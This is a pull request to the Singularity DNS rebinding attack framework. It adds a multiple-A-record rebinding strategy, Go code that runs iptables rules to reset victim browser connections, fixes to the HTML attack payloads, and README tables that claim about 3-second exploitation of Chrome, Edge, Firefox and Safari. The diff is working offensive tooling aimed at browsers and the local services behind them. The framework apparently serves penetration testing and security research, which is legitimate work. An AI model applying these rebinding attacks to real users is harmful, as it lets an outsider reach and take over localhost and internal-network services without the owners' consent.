### PR TITLE
Feature/attack multi a records

### DIFF
--- a/Readme.md
+++ b/Readme.md
@@ -221,7 +221,7 @@ Launch the Singularity binary, (`singularity-server`), with the `-h` parameter t
   - `DNSRebindFromQueryRoundRobin`
   - `DNSRebindFromQueryFirstThenSecond` (default)
   - `DNSRebindFromQueryRandom`
-  - `DNSRebindFromFromQueryMultiA`
+  - `DNSRebindFromFromQueryMultiA` (experimental)
 - `-HTTPServerPort value` : 
   Specify the attacker HTTP Server port that will serve HTML/JavaScript files. 
   Repeat this flag to listen on more than one HTTP port.

--- a/Readme.md
+++ b/Readme.md
@@ -175,12 +175,29 @@ Singularity has been tested to work in the following browsers:
 | Edge | Windows 10 |  ~21 to ~49 min |
 | Firefox | OSX | ~1 min |
 | Chrome | OSX | ~1 min |
+| Safari | OSX | ~1 min |
 | Chrome | Android | ~1 min |
 | Firefox | Android | ~1 min |
 | Safari | iOS | ~1 min |
 | Firefox | iOS | ~1 min |
 
-Microsoft Internet Explorer is currently not supported. Attacks via Microsoft Edge are possible but take a long time.
+The above was tested with Singularity's default conservative settings: 
+* DNS rebinding strategy: `DNSRebindFromQueryFirstThenSecond`
+* Fetch interval (Web interface): 20s
+* Target: 127.0.0.1.
+
+Much faster attacks can be achieved in certain configurations, as detailed in the table below:
+
+| Browser  | Operating System | Time to Exploit | Rebinding Strategy | Fetch Interval | Target Specification |
+| --- | --- | --- | --- | ---| ---| 
+| Chrome  | Windows 7 / 10 | ~3s | `DNSRebindFromFromQueryMultiA` | 1s | 127.0.0.1 |
+| Edge | Windows 10 |  ~3s | `DNSRebindFromFromQueryMultiA` | 1s |127.0.0.1 |
+| Firefox | Ubuntu | ~3s | `DNSRebindFromFromQueryMultiA` | 1s | 0.0.0.0 |
+| Chromium | Ubuntu | ~3s | `DNSRebindFromFromQueryMultiA` | 1s | 0.0.0.0 |
+| Chrome | OSX | ~3s | `DNSRebindFromFromQueryMultiA` | 1s |0.0.0.0 |
+| Safari | OSX |  ~3s | `DNSRebindFromFromQueryMultiA` | 1s |0.0.0.0 |
+
+We will add more platform as we test them. We elected a delay of 3s to perform DNS rebinding to cater for targets with a poor connection to the internet/network.
 
 ## Using Singularity
 When Singularity is run without arguments, the manager web interface
@@ -204,6 +221,7 @@ Launch the Singularity binary, (`singularity-server`), with the `-h` parameter t
   - `DNSRebindFromQueryRoundRobin`
   - `DNSRebindFromQueryFirstThenSecond` (default)
   - `DNSRebindFromQueryRandom`
+  - `DNSRebindFromFromQueryMultiA`
 - `-HTTPServerPort value` : 
   Specify the attacker HTTP Server port that will serve HTML/JavaScript files. 
   Repeat this flag to listen on more than one HTTP port.
@@ -314,6 +332,7 @@ application via the Google Chrome browser for instance.
  * Test `dig` query: `dig "s-ip.ad.dr.ss-127.0.0.1-<random_number>--e.dynamic.your.domain" @ip.ad.dr.ss`
  * `sudo ./singularity-server -HTTPServerPort 8080 -HTTPServerPort 8081  -dangerouslyAllowDynamicHTTPServers` starts a server on port 8080 and 8081 and enables requesting dynamically one additional HTTP port via the Manager interface.
  * Testing a service for a DNS rebinding vulnerability: In an HTTP intercepting proxy such as Portswigger's Burp Suite, replay a request to `localhost`, replacing the host header value e.g. "localhost" with "attacker.com". If the request is accepted, chances are that you have found a DNS rebinding vulnerability. What you can do after, the impact, depends on the vulnerable application.
+ * The `DNSRebindFromFromQueryMultiA` rebinding strategy does not support the "localhost" target value if trying to evade IPS/IDS and DNS filters.
 
 
 ## Contributing

--- a/Readme.md
+++ b/Readme.md
@@ -190,7 +190,7 @@ Much faster attacks can be achieved in certain configurations, as detailed in th
 
 | Browser  | Operating System | Time to Exploit | Rebinding Strategy | Fetch Interval | Target Specification |
 | --- | --- | --- | --- | ---| ---| 
-| Chrome  | Windows 7 / 10 | ~3s | `DNSRebindFromFromQueryMultiA` | 1s | 127.0.0.1 |
+| Chrome  | Windows 10 | ~3s | `DNSRebindFromFromQueryMultiA` | 1s | 127.0.0.1 |
 | Edge | Windows 10 |  ~3s | `DNSRebindFromFromQueryMultiA` | 1s |127.0.0.1 |
 | Firefox | Ubuntu | ~3s | `DNSRebindFromFromQueryMultiA` | 1s | 0.0.0.0 |
 | Chromium | Ubuntu | ~3s | `DNSRebindFromFromQueryMultiA` | 1s | 0.0.0.0 |

--- a/cmd/singularity-server/main.go
+++ b/cmd/singularity-server/main.go
@@ -87,10 +87,11 @@ func main() {
 	appConfig := initFromCmdLine()
 	dcss := &singularity.DNSClientStateStore{Sessions: make(map[string]*singularity.DNSClientState),
 		RebindingStrategy: appConfig.RebindingFnName}
-	hss := &singularity.HTTPServerStore{DynamicServers: make([]*http.Server, 2),
+	hss := &singularity.HTTPServerStoreHandler{DynamicServers: make([]*http.Server, 2),
 		StaticServers: make([]*http.Server, 1),
 		Errc:          make(chan singularity.HTTPServerError, 1),
-		AllowDynamicHTTPServers: appConfig.AllowDynamicHTTPServers}
+		AllowDynamicHTTPServers: appConfig.AllowDynamicHTTPServers,
+		Dcss: dcss}
 
 	// Attach DNS handler function
 	dns.HandleFunc(".", singularity.MakeRebindDNSHandler(appConfig, dcss))

--- a/cmd/singularity-server/main.go
+++ b/cmd/singularity-server/main.go
@@ -5,9 +5,10 @@ import (
 	"fmt"
 	"log"
 	"net/http"
-	"github.com/nccgroup/singularity"
 	"strconv"
 	"time"
+
+	"github.com/nccgroup/singularity"
 
 	"github.com/miekg/dns"
 )
@@ -33,7 +34,7 @@ func initFromCmdLine() *singularity.AppConfig {
 	var myArrayPortFlags arrayPortFlags
 
 	var dnsRebindingStrategy = flag.String("DNSRebindStrategy", "DNSRebindFromQueryFirstThenSecond",
-		"Specify how to respond to DNS queries from a victim client:  \"DNSRebindFromQueryRoundRobin\", \"DNSRebindFromQueryFirstThenSecond\", \"DNSRebindFromQueryRandom\"")
+		"Specify how to respond to DNS queries from a victim client:  \"DNSRebindFromQueryRoundRobin\", \"DNSRebindFromQueryFirstThenSecond\", \"DNSRebindFromQueryRandom\", DNSRebindFromFromQueryMultiA\"")
 	var responseIPAddr = flag.String("ResponseIPAddr", "192.168.0.1",
 		"Specify the attacker host IP address that will be rebound to the victim host address using strategy specified by flag \"-DNSRebingStrategy\"")
 	var responseReboundIPAddr = flag.String("ResponseReboundIPAddr", "127.0.0.1",
@@ -58,10 +59,13 @@ func initFromCmdLine() *singularity.AppConfig {
 			appConfig.RebindingFn = singularity.DNSRebindFromQueryFirstThenSecond
 		case "DNSRebindFromQueryRandom":
 			appConfig.RebindingFn = singularity.DNSRebindFromQueryRandom
+		case "DNSRebindFromFromQueryMultiA":
+			appConfig.RebindingFn = singularity.DNSRebindFromFromQueryMultiA
 		default:
 			log.Fatal("No valid DNS rebinding strategy provided")
 		}
 	}
+	appConfig.RebindingFnName = *dnsRebindingStrategy
 
 	if !flagset["HTTPServerPort"] {
 		myArrayPortFlags = arrayPortFlags{8080}
@@ -81,7 +85,8 @@ func initFromCmdLine() *singularity.AppConfig {
 func main() {
 
 	appConfig := initFromCmdLine()
-	dcss := &singularity.DNSClientStateStore{Sessions: make(map[string]*singularity.DNSClientState)}
+	dcss := &singularity.DNSClientStateStore{Sessions: make(map[string]*singularity.DNSClientState),
+		RebindingStrategy: appConfig.RebindingFnName}
 	hss := &singularity.HTTPServerStore{DynamicServers: make([]*http.Server, 2),
 		StaticServers: make([]*http.Server, 1),
 		Errc:          make(chan singularity.HTTPServerError, 1),
@@ -106,7 +111,7 @@ func main() {
 
 	for _, port := range appConfig.HTTPServerPorts {
 		// Start HTTP Servers
-		httpServer := singularity.NewHTTPServer(port, hss)
+		httpServer := singularity.NewHTTPServer(port, hss, dcss)
 		httpServerErr := singularity.StartHTTPServer(httpServer, hss, false)
 
 		if httpServerErr != nil {

--- a/firewall.go
+++ b/firewall.go
@@ -25,6 +25,7 @@ func NewIPTableRule(srcAddr string, srcPort string,
 	return &p
 }
 
+// TODO Experimental
 func (ipt *IPTablesRule) generateSourcePortRange(max int) {
 	i, err := strconv.Atoi(ipt.srcPort)
 	if err != nil {
@@ -49,7 +50,7 @@ func (ipt *IPTablesRule) generateSourcePortRange(max int) {
 func (ipt *IPTablesRule) makeAndRunRule(command string) {
 	rule := exec.Command("/sbin/iptables",
 		command, "INPUT", "-p", "tcp", "-j", "REJECT", "--reject-with", "tcp-reset",
-		"--source", ipt.srcAddr, "--sport", ipt.srcPortRange,
+		"--source", ipt.srcAddr, //"--sport" srcPortRange,
 		"--destination", ipt.dstAddr, "--destination-port", ipt.dstPort)
 	err := rule.Run()
 	log.Printf("`iptables` finished with error: %v", err)

--- a/firewall.go
+++ b/firewall.go
@@ -1,0 +1,66 @@
+package singularity
+
+import (
+	"fmt"
+	"log"
+	"os/exec"
+	"strconv"
+)
+
+//IPTablesRule is a struct representing a linux iptable firewall rule
+type IPTablesRule struct {
+	srcAddr      string
+	srcPort      string
+	dstAddr      string
+	dstPort      string
+	srcPortRange string
+}
+
+//NewIPTableRule populate an iptables rule
+func NewIPTableRule(srcAddr string, srcPort string,
+	dstAddr string, dstPort string) *IPTablesRule {
+	p := IPTablesRule{srcAddr: srcAddr, srcPort: srcPort,
+		dstAddr: dstAddr, dstPort: dstPort}
+	p.generateSourcePortRange(10)
+	return &p
+}
+
+func (ipt *IPTablesRule) generateSourcePortRange(max int) {
+	i, err := strconv.Atoi(ipt.srcPort)
+	if err != nil {
+		log.Fatal(err)
+	}
+
+	if (i < 0) || (i > 65535) {
+		log.Fatal("Source port is not within an expected range")
+	}
+
+	maxPort := i + max
+	var maxPortString string
+	if maxPort > 65535 {
+		maxPortString = "65535"
+	} else {
+		maxPortString = strconv.Itoa(maxPort)
+	}
+	ipt.srcPortRange = fmt.Sprintf("%v:%v", ipt.srcPort, maxPortString)
+
+}
+
+func (ipt *IPTablesRule) makeAndRunRule(command string) {
+	rule := exec.Command("/sbin/iptables",
+		command, "INPUT", "-p", "tcp", "-j", "REJECT", "--reject-with", "tcp-reset",
+		"--source", ipt.srcAddr, "--sport", ipt.srcPortRange,
+		"--destination", ipt.dstAddr, "--destination-port", ipt.dstPort)
+	err := rule.Run()
+	log.Printf("`iptables` finished with error: %v", err)
+}
+
+//AddRule adds an iptables rule in Linux iptable
+func (ipt *IPTablesRule) AddRule() {
+	ipt.makeAndRunRule("-A")
+}
+
+//RemoveRule removes an iptables rule in Linux iptable
+func (ipt *IPTablesRule) RemoveRule() {
+	ipt.makeAndRunRule("-D")
+}

--- a/html/payload-simple-fetch-get.html
+++ b/html/payload-simple-fetch-get.html
@@ -18,7 +18,7 @@ function attack() {
 	fetch('/')
 		.then(responseOKOrFail("Could not submit a request to get a list of keys"))
 		.then(function (response) { // we successfully received the server response
-			if (response.includes(indextoken) == false) {
+			if (response.includes(indextoken) == false && response.length > 0) {
 				clearInterval(timer); // stop the attack timer
 				console.log("SUCCESS"); // log to the console
 				// Terminate the attack:

--- a/html/payload-simple-xhr-get.html
+++ b/html/payload-simple-xhr-get.html
@@ -43,6 +43,11 @@
                             return;
                         }
 
+                        if (responseText.length == 0 ) { //sometimes the response is empty.
+                            console.log("Response length is 0. Retrying...");
+                            return;
+                        }
+
                         // No need to retry, the attack succeeded.
                         clearInterval(timer);
 

--- a/singularity.go
+++ b/singularity.go
@@ -368,15 +368,17 @@ type HTTPServersConfig struct {
 
 func (d *DefaultHeadersHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
 
-	//We handle the particular case where we use multiple A records rebinding.
-	// We Hijack the connection from HTTP server if we have a DNS session with browser client
-	// and if this session is more than 3 seconds.
-	// Then we create a Linux iptable rule that drops the connection to the browser
-	// using unsolicated TCP RST packet.
-	// The connection drop is defined by the source address, source port range(current port + 10)
-	// and the server address and port.
-	// the rule is dropped after 10 seconds.
-	// So in the singularity manager interface, we need to ensure that the polling interval is fast, e.g. 1 sec.
+	//We handle the particular case where we use multiple A records DNS rebinding.
+	// We hijack the connection from the HTTP server
+	// * if we have a DNS session with the client browser
+	// * and if this session is more than 3 seconds.
+	// Then we create a Linux iptables rule that drops the connection from the browser
+	// using an unsolicited TCP RST packet.
+	// The connection being dropped is defined by the source address,
+	// source port range(current port + 10) and the server address and port.
+	// The rule is removed after 10 seconds after being implemented.
+	// In the singularity manager interface,
+	// we need to ensure that the polling interval is fast, e.g. 1 sec.
 	name, err := NewDNSQuery(r.Host)
 	if err == nil {
 


### PR DESCRIPTION
Adding  `-DNSRebindStrategy DNSRebindFromFromQueryMultiA` experimental command flag to respond with multiple DNS A records per query. Makes DNS rebinding nearly instant on most desktop browsers/platforms. Small risk of breaking DNS rebinding against multiple concurrent users NAT'ed behind same IP address in this mode (time window of ~10s).